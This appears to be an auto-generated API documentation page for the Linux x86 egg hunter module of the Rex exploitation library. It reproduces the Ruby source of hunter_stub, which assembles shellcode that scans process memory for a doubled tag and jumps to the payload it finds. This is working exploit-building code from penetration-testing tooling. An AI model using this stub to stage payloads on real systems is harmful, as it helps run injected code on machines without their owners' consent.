Module: Rex::Exploitation::Egghunter::Linux::X86
- Defined in:
- lib/rex/exploitation/egghunter.rb
Constant Summary collapse
- Alias =
ARCH_X86
Instance Method Summary collapse
-
#hunter_stub(payload, badchars = '', opts = {}) ⇒ Object
The egg hunter stub for linux/x86.
Instance Method Details
#hunter_stub(payload, badchars = '', opts = {}) ⇒ Object
The egg hunter stub for linux/x86.
247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 |
# File 'lib/rex/exploitation/egghunter.rb', line 247 def hunter_stub(payload, badchars = '', opts = {}) startreg = opts[:startreg] raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4 marker = "0x%x" % opts[:eggtag].unpack('V').first checksum = checksum_stub(payload, badchars, opts) startstub = '' if startreg if startreg.downcase != 'ecx' startstub = "\n\tmov ecx,#{startreg}\n\tjmp next_addr" else startstub = "\n\tjmp next_addr" end end startstub << "\n\t" if startstub.length > 0 assembly = " cld\n\#{startstub}\ncheck_readable:\n or cx,0xfff\nnext_addr:\n inc ecx\n push 0x43 ; use 'sigaction' syscall\n pop eax\n int 0x80\n cmp al,0xf2\n je check_readable\n\ncheck_for_tag:\n ; check that the tag matches once\n mov eax,\#{marker}\n mov edi,ecx\n scasd\n jne next_addr\n ; it must match a second time too\n scasd\n jne next_addr\n\n ; check the checksum if the feature is enabled\n\#{checksum}\n\n ; jump to the payload\n jmp edi\n" assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string # return the stub assembled_code end |